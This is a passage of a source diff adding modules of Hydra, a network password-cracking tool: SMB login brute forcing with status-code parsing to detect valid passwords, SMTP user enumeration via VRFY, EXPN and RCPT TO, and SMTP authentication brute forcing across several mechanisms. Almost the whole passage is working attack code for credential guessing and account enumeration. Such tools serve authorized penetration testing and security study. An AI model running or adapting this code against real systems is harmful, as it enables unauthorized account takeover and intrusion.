workgroup values */ + + j = UTF8_UTF16LE((unsigned char *) szLogin, strlen(szLogin), buf + iOffset + iByteCount+1, 2*strlen(szLogin)); + iByteCount += j +3; /* NULL pad account name */ + j = UTF8_UTF16LE(workgroup, strlen((char *) workgroup), buf+iOffset+iByteCount, 2*strlen((char *) workgroup)); + iByteCount += j+2; // NULL pad workgroup name + + /* Set native OS and LAN Manager values */ + + char *szOSName = "Unix"; + j = UTF8_UTF16LE((unsigned char *) szOSName, strlen(szOSName), buf+iOffset+iByteCount, 2*sizeof(szOSName)); + iByteCount += j+2; // NULL terminated + char *szLANMANName = "Samba"; + j = UTF8_UTF16LE((unsigned char *) szLANMANName, strlen(szLANMANName), buf+iOffset+iByteCount, 2*sizeof(szLANMANName)); + iByteCount += j+2; // NULL terminated + + /* Set the header length */ + buf[2] = (iOffset - 4 + iByteCount) / 256; + buf[3] = (iOffset - 4 + iByteCount) % 256; + + if (verbose) + hydra_report(stderr, "[VERBOSE] Set NBSS header length: %2.2X\n", buf[3]); + + /* Set data byte count */ + buf[iOffset - 2] = iByteCount; + if (verbose) + hydra_report(stderr, "[VERBOSE] Set byte count: %2.2X\n", buf[57]); + + hydra_send(s, (char *) buf, iOffset + iByteCount, 0); + + nReceiveBufferSize = 0; + nReceiveBufferSize = hydra_recv(s, bufReceive, sizeof(bufReceive)); + if ((bufReceive == NULL) || (nReceiveBufferSize == 0)) + return -1; + + /* 41 - Action (Guest/Non-Guest Account) */ + /* 9 - NT Status (Error code) */ + return (((bufReceive[41] & 0x01) << 24) | ((bufReceive[11] & 0xFF) << 16) | ((bufReceive[10] & 0xFF) << 8) | (bufReceive[9] & 0xFF)); +} + +int start_smb(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass; + int SMBerr, SMBaction; + unsigned long SMBSessionRet; + char ipaddr_str[64]; + char ErrorCode[10]; + + memset(&ErrorCode, 0, 10); + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + strcpy(ipaddr_str, hydra_address2string(ip)); + + SMBSessionRet = SMBSessionSetup(s, login, pass, miscptr); + if (SMBSessionRet == -1) + return 3; + SMBerr = (unsigned long) SMBSessionRet & 0x00FFFFFF; + SMBaction = ((unsigned long) SMBSessionRet & 0xFF000000) >> 24; + + if (verbose) + hydra_report(stderr, "[VERBOSE] SMBSessionRet: %8.8X SMBerr: %4.4X SMBaction: %2.2X\n", (unsigned int) SMBSessionRet, SMBerr, SMBaction); + + /* + some error code are available here: + http://msdn.microsoft.com/en-us/library/ee441884(v=prot.13).aspx + */ + + if (SMBerr == 0x000000) { /* success */ + if (SMBaction == 0x01) { /* invalid account - anonymous connection */ + fprintf(stderr, "[%d][smb] Host: %s Account: %s Error: Invalid account (Anonymous success)\n", port, ipaddr_str, login); + hydra_completed_pair_skip(); + } else { /* valid account */ + hydra_report_found_host(port, ip, "smb", fp); + hydra_completed_pair_found(); + } + } else if ((SMBerr == 0x00000D) && (SMBaction == 0x00)) { + hydra_report(stderr, "[ERROR] Invalid parameter status received, either the account or the method used are not valid\n"); + hydra_completed_pair_skip(); + } else if (SMBerr == 0x00006E) { /* Valid password, GPO Disabling Remote Connections Using NULL Passwords */ + if (verbose) + hydra_report(stderr, "[VERBOSE] Valid password, GPO Disabling Remote Connections Using NULL Passwords\n"); + hydra_report_found_host(port, ip, "smb", fp); + hydra_completed_pair_found(); + } else if (SMBerr == 0x00015B) { /* Valid password, GPO "Deny access to this computer from the network" */ + if (verbose) + hydra_report(stderr, "[VERBOSE] Valid password, GPO Deny access to this computer from the network\n"); + hydra_report_found_host(port, ip, "smb", fp); + hydra_completed_pair_found(); + } else if (SMBerr == 0x000193) { /* Valid password, account expired */ + if (verbose) + hydra_report(stderr, "[VERBOSE] Valid password, account expired\n"); + hydra_report_found_host(port, ip, "smb", fp); + hydra_completed_pair_found(); + } else if ((SMBerr == 0x000224) || (SMBerr == 0xC20002)) { /* Valid password, account expired */ + if (verbose) + hydra_report(stderr, "[VERBOSE] Valid password, password expired and must be changed on next logon\n"); + hydra_report_found_host(port, ip, "smb", fp); + hydra_completed_pair_found(); + } else if ((SMBerr == 0x00006F) || (SMBerr == 0xC10002)) { /* Invalid logon hours */ + if (verbose) + hydra_report(stderr, "[VERBOSE] Valid password, but logon hours invalid\n"); + hydra_report_found_host(port, ip, "smb", fp); + hydra_completed_pair_found(); + } else if (SMBerr == 0x050001) { /* AS/400 -- Incorrect password */ + if (verbose) + fprintf(stderr, "[%d][smb] Host: %s Account: %s Error: Incorrect password or account disabled\n", port, ipaddr_str, login); + if ((miscptr) && (strstr(miscptr, "LM"))) + hydra_report(stderr, "[INFO] LM dialect may be disabled, try LMV2 instead\n"); + hydra_completed_pair_skip(); + } else if (SMBerr == 0x000024) { /* change password on next login [success] */ + fprintf(stderr, "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD\n", port, ipaddr_str, login); + hydra_completed_pair_found(); + } else if (SMBerr == 0x00006D) { /* STATUS_LOGON_FAILURE */ + hydra_completed_pair(); + } else if (SMBerr == 0x000071) { /* password expired */ + if (verbose) + fprintf(stderr, "[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED\n", port, ipaddr_str, login); + hydra_completed_pair_skip(); + } else if ((SMBerr == 0x000072) || (SMBerr == 0xBF0002)) { /* account disabled *//* BF0002 on w2k */ + if (verbose) + fprintf(stderr, "[%d][smb] Host: %s Account: %s Error: ACCOUNT_DISABLED\n", port, ipaddr_str, login); + hydra_completed_pair_skip(); + } else if (SMBerr == 0x000034 || SMBerr == 0x000234) { /* account locked out */ + if (verbose) + fprintf(stderr, "[%d][smb] Host: %s Account: %s Error: ACCOUNT_LOCKED\n", port, ipaddr_str, login); + hydra_completed_pair_skip(); + } else if (SMBerr == 0x00008D) { /* ummm... broken client-domain membership */ + if (verbose) + fprintf(stderr, "[%d][smb] Host: %s Account: %s Error: NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE\n", port, ipaddr_str, login); + hydra_completed_pair(); + } else { /* failed */ + if (verbose) + fprintf(stderr, "[%d][smb] Host: %s Account: %s Unknown Error: %6.6X\n", port, ipaddr_str, login, SMBerr); + hydra_completed_pair(); + } + + hydra_disconnect(s); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_smb(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + + //default is both (local and domain) checks and normal passwd + accntFlag = 2; //BOTH + hashFlag = 0; //PASS + smb_auth_mechanism = AUTH_NTLM; + + if (miscptr) { + //check group + strupper(miscptr); + if (strstr(miscptr, "OTHER_DOMAIN:") != NULL) { + char *tmpdom; + int err = 0; + + accntFlag = 4; //OTHER DOMAIN + tmpdom = strstr(miscptr, "OTHER_DOMAIN:"); + tmpdom = tmpdom + strlen("OTHER_DOMAIN:"); + + if (tmpdom) { + //split the string after the domain if there are other values + strtok(tmpdom, " "); + if (tmpdom) { + strncpy((char *) domain, (char *) tmpdom, 16); + } else { + err = 1; + } + } else { + err = 1; + } + + if (err) { + if (verbose) + hydra_report(stdout, "[VERBOSE] requested line mode\n"); + accntFlag = 2; + } + } else if (strstr(miscptr, "LOCAL") != NULL) { + accntFlag = 0; //LOCAL + } else if (strstr(miscptr, "DOMAIN") != NULL) { + accntFlag = 1; //DOMAIN + } + //check pass + if (strstr(miscptr, "HASH") != NULL) { + hashFlag = 1; + } else if (strstr(miscptr, "MACHINE") != NULL) { + hashFlag = 2; + } + //check auth + if (strstr(miscptr, "NTLMV2") != NULL) { + smb_auth_mechanism = AUTH_NTLMv2; + } else if (strstr(miscptr, "NTLM") != NULL) { + smb_auth_mechanism = AUTH_NTLM; + } else if (strstr(miscptr, "LMV2") != NULL) { + smb_auth_mechanism = AUTH_LMv2; + } else if (strstr(miscptr, "LM") != NULL) { + smb_auth_mechanism = AUTH_LM; + } + } + if (verbose) { + hydra_report(stdout, "[VERBOSE] accntFlag is %d\n", accntFlag); + hydra_report(stdout, "[VERBOSE] hashFlag is %d\n", accntFlag); + } + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + for (;;) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(300000); + + if (port != 0) { + sock = hydra_connect_tcp(ip, port); + if (port == PORT_SMB) { + protoFlag = WIN_NETBIOSMODE; + if (verbose) + hydra_report(stderr, "[VERBOSE] Attempting NETBIOS mode.\n"); + } else { + protoFlag = WIN2000_NATIVEMODE; + if (verbose) + hydra_report(stderr, "[VERBOSE] Attempting WIN2K Native mode.\n"); + } + } else { + sock = hydra_connect_tcp(ip, PORT_SMBNT); + if (sock > 0) { + port = PORT_SMBNT; + protoFlag = WIN2000_NATIVEMODE; + } else { + hydra_report(stderr, "Failed to establish WIN2000_NATIVE mode. Attempting WIN_NETBIOS mode.\n"); + port = PORT_SMB; + protoFlag = WIN_NETBIOSMODE; + sock = hydra_connect_tcp(ip, PORT_SMB); + } + } + if (sock < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + if (NBSSessionRequest(sock) < 0) { + fprintf(stderr, "[ERROR] Session Setup Failed (is the server service running?)\n"); + hydra_child_exit(2); + } + next_run = SMBNegProt(sock); + break; + case 2: /* run the cracking function */ + next_run = start_smb(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + fprintf(stderr, "[ERROR] Caught unknown return code (%d), exiting!\n", run); + hydra_child_exit(0); + } + run = next_run; + } +} +#endif + +int service_smb_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-smtp-enum.c b/hydra-smtp-enum.c new file mode 100644 index 0000000..e13a193 --- /dev/null +++ b/hydra-smtp-enum.c @@ -0,0 +1,264 @@ + +/* + +david: module used to enum smtp users with either +VRFY, EXPN or RCPT TO command. +Optional input could be set to +VRFY, EXPN or RCPT to force the mode + +login will be used as the username +passwd will be used as the domain name + +*/ + +#include "hydra-mod.h" + +extern char *HYDRA_EXIT; +char *buf; +char *err = NULL; +int tosent = 0; + +#define VRFY 0 +#define EXPN 1 +#define RCPT 2 + +int smtp_enum_cmd = VRFY; + +int start_smtp_enum(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[500]; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + while (hydra_data_ready(s) > 0) { + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + free(buf); + } + + if (smtp_enum_cmd == RCPT) { + tosent = 0; + if (pass != empty) { + snprintf(buffer, sizeof(buffer), "MAIL FROM: root@%s\r\n", pass); + } else { + snprintf(buffer, sizeof(buffer), "MAIL FROM: root\r\n"); + } + if (debug) + hydra_report(stderr, "DEBUG C: %s", buffer); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + if (debug) + hydra_report(stderr, "DEBUG S: %s", buf); + /* good return values are something like 25x */ +#ifdef HAVE_PCRE + if (hydra_string_match(buf, "^25\\d\\s")) { +#else + if (strstr(buf, "25") != NULL) { +#endif + if (pass != empty) { + snprintf(buffer, sizeof(buffer), "RCPT TO: %s@%s\r\n", login, pass); + } else { + snprintf(buffer, sizeof(buffer), "RCPT TO: %s\r\n", login); + } + tosent = 1; + } else { + err = strstr(buf, "Error"); + if (err) { + if (debug) { + hydra_report(stderr, "Server %s", err); + } + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 2; + } + } + } else { + char cmd[5] = ""; + + memset(cmd, 0, sizeof(cmd)); + if (smtp_enum_cmd == EXPN) + strcpy(cmd, "EXPN"); + else + strcpy(cmd, "VRFY"); + if (pass != empty) { + snprintf(buffer, sizeof(buffer), "%s %s@%s\r\n", cmd, login, pass); + } else { + snprintf(buffer, sizeof(buffer), "%s %s\r\n", cmd, login); + } + } + if (debug) + hydra_report(stderr, "DEBUG C: %s", buffer); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + if (debug) + hydra_report(stderr, "DEBUG S: %s", buf); + /* good return values are something like 25x */ +#ifdef HAVE_PCRE + if (hydra_string_match(buf, "^25\\d\\s")) { +#else + if (strstr(buf, "25") != NULL) { +#endif + hydra_report_found_host(port, ip, "smtp-enum", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + err = strstr(buf, "Error"); + if (err || tosent || strncmp(buf, "50", 2) == 0) { + // we should report command not identified by the server + //502 5.5.2 Error: command not recognized +//#ifdef HAVE_PCRE +// if ((debug || hydra_string_match(buf, "\\scommand\\snot\\srecognized")) && err) { +//#else +// if ((debug || strstr(buf, "command") != NULL) && err) { +//#endif +// hydra_report(stderr, "Server %s", err); +// } + if (strncmp(buf, "500 ", 4) == 0) { + hydra_report(stderr, "[ERROR] command is disabled on the server (choose different method): %s", buf); + free(buf); + return 3; + } + memset(buffer, 0, sizeof(buffer)); + //503 5.5.1 Error: nested MAIL command + strncpy(buffer, "RSET\r\n", sizeof(buffer)); + free(buf); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + } + + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + + return 2; +} + +void service_smtp_enum(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1, i = 0; + int myport = PORT_SMTP, mysslport = PORT_SMTP_SSL; + char *buffer = "HELO hydra\r\n"; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = myport; + } + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + /* receive initial header */ + if ((buf = hydra_receive_line(sock)) == NULL) + hydra_child_exit(2); + if (strstr(buf, "220") == NULL) { + hydra_report(stderr, "Warning: SMTP does not allow to connect: %s\n", buf); + hydra_child_exit(2); + } +// while (strstr(buf, "220 ") == NULL) { +// free(buf); +// buf = hydra_receive_line(sock); +// } + +// if (buf[0] != '2') { + if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) { + free(buf); + hydra_child_exit(2); + } +// } + + free(buf); + if ((buf = hydra_receive_line(sock)) == NULL) + hydra_child_exit(2); + if (buf[0] != '2') { + hydra_report(stderr, "Warning: SMTP does not respond correctly to HELO: %s\n", buf); + hydra_child_exit(2); + } + + if ((miscptr != NULL) && (strlen(miscptr) > 0)) { + for (i = 0; i < strlen(miscptr); i++) + miscptr[i] = (char) toupper((int) miscptr[i]); + + if (strncmp(miscptr, "EXPN", 4) == 0) + smtp_enum_cmd = EXPN; + + if (strncmp(miscptr, "RCPT", 4) == 0) + smtp_enum_cmd = RCPT; + } + if (debug) { + switch (smtp_enum_cmd) { + hydra_report(stdout, "[VERBOSE] "); + case VRFY: + hydra_report(stdout, "using SMTP VRFY command\n"); + break; + case EXPN: + hydra_report(stdout, "using SMTP EXPN command\n"); + break; + case RCPT: + hydra_report(stdout, "using SMTP RCPT TO command\n"); + break; + } + } + free(buf); + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_smtp_enum(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) { + sock = hydra_disconnect(sock); + } + hydra_child_exit(0); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_smtp_enum_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-smtp.c b/hydra-smtp.c new file mode 100644 index 0000000..9c31f3e --- /dev/null +++ b/hydra-smtp.c @@ -0,0 +1,451 @@ +#include "hydra-mod.h" +#include "sasl.h" + +extern char *HYDRA_EXIT; +char *buf; + +int smtp_auth_mechanism = AUTH_LOGIN; + +char *smtp_read_server_capacity(int sock) { + char *ptr = NULL; + int resp = 0; + char *buf = NULL; + + do { + if (buf != NULL) + free(buf); + ptr = buf = hydra_receive_line(sock); + if (buf != NULL) { + if (isdigit((int) buf[0]) && buf[3] == ' ') + resp = 1; + else { + if (buf[strlen(buf) - 1] == '\n') + buf[strlen(buf) - 1] = 0; + if (buf[strlen(buf) - 1] == '\r') + buf[strlen(buf) - 1] = 0; +#ifdef NO_RINDEX + if ((ptr = strrchr(buf, '\n')) != NULL) { +#else + if ((ptr = rindex(buf, '\n')) != NULL) { +#endif + ptr++; + if (isdigit((int) *ptr) && *(ptr + 3) == ' ') + resp = 1; + } + } + } + } while (buf != NULL && resp == 0); + return buf; +} + +int start_smtp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[500], buffer2[500]; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + while (hydra_data_ready(s) > 0) { + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + free(buf); + } + + switch (smtp_auth_mechanism) { + + case AUTH_PLAIN: + sprintf(buffer, "AUTH PLAIN\r\n"); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (strstr(buf, "334") == NULL) { + hydra_report(stderr, "[ERROR] SMTP PLAIN AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + + memset(buffer, 0, sizeof(buffer)); + sasl_plain(buffer, login, pass); + sprintf(buffer, "%.250s\r\n", buffer); + break; + +#ifdef LIBOPENSSL + case AUTH_CRAMMD5:{ + int rc = 0; + char *preplogin; + + rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin); + if (rc) { + return 3; + } + + sprintf(buffer, "AUTH CRAM-MD5\r\n"); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + //get the one-time BASE64 encoded challenge + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (strstr(buf, "334") == NULL) { + hydra_report(stderr, "[ERROR] SMTP CRAM-MD5 AUTH : %s\n", buf); + free(buf); + return 3; + } + memset(buffer, 0, sizeof(buffer)); + from64tobits((char *) buffer, buf + 4); + free(buf); + + memset(buffer2, 0, sizeof(buffer2)); + sasl_cram_md5(buffer2, pass, buffer); + + sprintf(buffer, "%s %.250s", preplogin, buffer2); + hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer)); + sprintf(buffer, "%.250s\r\n", buffer); + free(preplogin); + } + break; + + case AUTH_DIGESTMD5:{ + sprintf(buffer, "AUTH DIGEST-MD5\r\n"); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + //receive + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (strstr(buf, "334") == NULL) { + hydra_report(stderr, "[ERROR] SMTP DIGEST-MD5 AUTH : %s\n", buf); + free(buf); + return 3; + } + memset(buffer, 0, sizeof(buffer)); + from64tobits((char *) buffer, buf + 4); + free(buf); + + if (verbose) + hydra_report(stderr, "DEBUG S: %s\n", buffer); + + sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "smtp", NULL, 0, NULL); + if (buffer2 == NULL) + return 3; + + if (verbose) + hydra_report(stderr, "DEBUG C: %s\n", buffer2); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%s\r\n", buffer2); + } + break; +#endif + + case AUTH_NTLM:{ + unsigned char buf1[4096]; + unsigned char buf2[4096]; + + //send auth and receive challenge + buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2)); + sprintf(buffer, "AUTH NTLM %s\r\n", buf1); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (strstr(buf, "334") == NULL) { + hydra_report(stderr, "[ERROR] SMTP NTLM AUTH : %s\n", buf); + free(buf); + return 3; + } + //recover challenge + from64tobits((char *) buf1, buf + 4); + free(buf); + + buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2)); + sprintf(buffer, "%s\r\n", buf1); + } + break; + + default: + /* by default trying AUTH LOGIN */ + sprintf(buffer, "AUTH LOGIN\r\n"); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + + /* 504 5.7.4 Unrecognized authentication type */ + if (strstr(buf, "334") == NULL) { + hydra_report(stderr, "[ERROR] SMTP LOGIN AUTH, either this auth is disabled\nor server is not using auth: %s\n", buf); + free(buf); + return 3; + } + free(buf); + sprintf(buffer2, "%.250s", login); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%.250s\r\n", buffer2); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + if (strstr(buf, "334") == NULL) { + hydra_report(stderr, "[ERROR] SMTP LOGIN AUTH : %s\n", buf); + free(buf); + return (3); + } + free(buf); + + sprintf(buffer2, "%.250s", pass); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%.250s\r\n", buffer2); + } + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + +#ifdef LIBOPENSSL + if (smtp_auth_mechanism == AUTH_DIGESTMD5) { + if (strstr(buf, "334") != NULL) { + memset(buffer2, 0, sizeof(buffer2)); + from64tobits((char *) buffer2, buf + 4); + if (strstr(buffer2, "rspauth=") != NULL) { + hydra_report_found_host(port, ip, "smtp", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + } + } else +#endif + { + if (strstr(buf, "235") != NULL) { + hydra_report_found_host(port, ip, "smtp", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + } + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + + return 2; +} + +void service_smtp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1, i = 0; + int myport = PORT_SMTP, mysslport = PORT_SMTP_SSL, disable_tls = 1; + + char *buffer1 = "EHLO hydra\r\n"; + char *buffer2 = "HELO hydra\r\n"; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = myport; + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + + /* receive initial header */ + if ((buf = hydra_receive_line(sock)) == NULL) + hydra_child_exit(2); + if (strstr(buf, "220") == NULL) { + hydra_report(stderr, "[WARNING] SMTP does not allow to connect: %s\n", buf); + free(buf); + hydra_child_exit(2); + } + while (strstr(buf, "220 ") == NULL) { + free(buf); + buf = hydra_receive_line(sock); + } + free(buf); + + /* send ehlo and receive/ignore reply */ + if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0) + hydra_child_exit(2); + + buf = smtp_read_server_capacity(sock); + if (buf == NULL) + hydra_child_exit(2); + + if ((miscptr != NULL) && (strlen(miscptr) > 0)) { + for (i = 0; i < strlen(miscptr); i++) + miscptr[i] = (char) toupper((int) miscptr[i]); + + if (strstr(miscptr, "TLS") || strstr(miscptr, "SSL")) { + disable_tls = 0; + } + } +#ifdef LIBOPENSSL + if (!disable_tls) { + /* if we got a positive answer */ + if (buf[0] == '2') { + if (strstr(buf, "STARTTLS") != NULL) { + hydra_send(sock, "STARTTLS\r\n", strlen("STARTTLS\r\n"), 0); + free(buf); + buf = hydra_receive_line(sock); + if (buf[0] != '2') { + hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n"); + } else { + free(buf); + if ((hydra_connect_to_ssl(sock) == -1)) { + if (verbose) + hydra_report(stderr, "[ERROR] Can't use TLS\n"); + disable_tls = 1; + run = 1; + break; + } else { + if (verbose) + hydra_report(stderr, "[VERBOSE] TLS connection done\n"); + } + /* ask again capability request but in TLS mode */ + if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0) + hydra_child_exit(2); + buf = smtp_read_server_capacity(sock); + if (buf == NULL) + hydra_child_exit(2); + } + } else + hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n"); + } else + hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n"); + } +#endif + + if (buf[0] != '2') { + if (hydra_send(sock, buffer2, strlen(buffer2), 0) < 0) + hydra_child_exit(2); + + free(buf); + buf = smtp_read_server_capacity(sock); + + if (buf == NULL) + hydra_child_exit(2); + } + + if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "NTLM") != NULL)) { + smtp_auth_mechanism = AUTH_NTLM; + } +#ifdef LIBOPENSSL + if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "DIGEST-MD5") != NULL)) { + smtp_auth_mechanism = AUTH_DIGESTMD5; + } + + if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "CRAM-MD5") != NULL)) { + smtp_auth_mechanism = AUTH_CRAMMD5; + } +#endif + + if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "PLAIN") != NULL)) { + smtp_auth_mechanism = AUTH_PLAIN; + } + + + if ((miscptr != NULL) && (strlen(miscptr) > 0)) { + + if (strstr(miscptr, "LOGIN")) + smtp_auth_mechanism = AUTH_LOGIN; + + if (strstr(miscptr, "PLAIN")) + smtp_auth_mechanism = AUTH_PLAIN; + +#ifdef LIBOPENSSL + if (strstr(miscptr, "CRAM-MD5")) + smtp_auth_mechanism = AUTH_CRAMMD5; + + if (strstr(miscptr, "DIGEST-MD5")) + smtp_auth_mechanism = AUTH_DIGESTMD5; +#endif + + if (strstr(miscptr, "NTLM")) + smtp_auth_mechanism = AUTH_NTLM; + + } + + if (verbose) { + switch (smtp_auth_mechanism) { + case AUTH_LOGIN: + hydra_report(stderr, "[VERBOSE] using SMTP LOGIN AUTH mechanism\n"); + break; + case AUTH_PLAIN: + hydra_report(stderr, "[VERBOSE] using SMTP PLAIN AUTH mechanism\n"); + break; +#ifdef LIBOPENSSL + case AUTH_CRAMMD5: + hydra_report(stderr, "[VERBOSE] using SMTP CRAM-MD5 AUTH mechanism\n"); + break; + case AUTH_DIGESTMD5: + hydra_report(stderr, "[VERBOSE] using SMTP DIGEST-MD5 AUTH mechanism\n"); + break; +#endif + case AUTH_NTLM: + hydra_report(stderr, "[VERBOSE] using SMTP NTLM AUTH mechanism\n"); + break; + } + } + free(buf); + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_smtp(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) { + sock = hydra_disconnect(sock); + } + hydra_child_exit(0); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_smtp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-snmp.c b/hydra-snmp.c new file mode 100644 index 0000000..0f1b49c --- /dev/null +++ b/hydra-snmp.c @@ 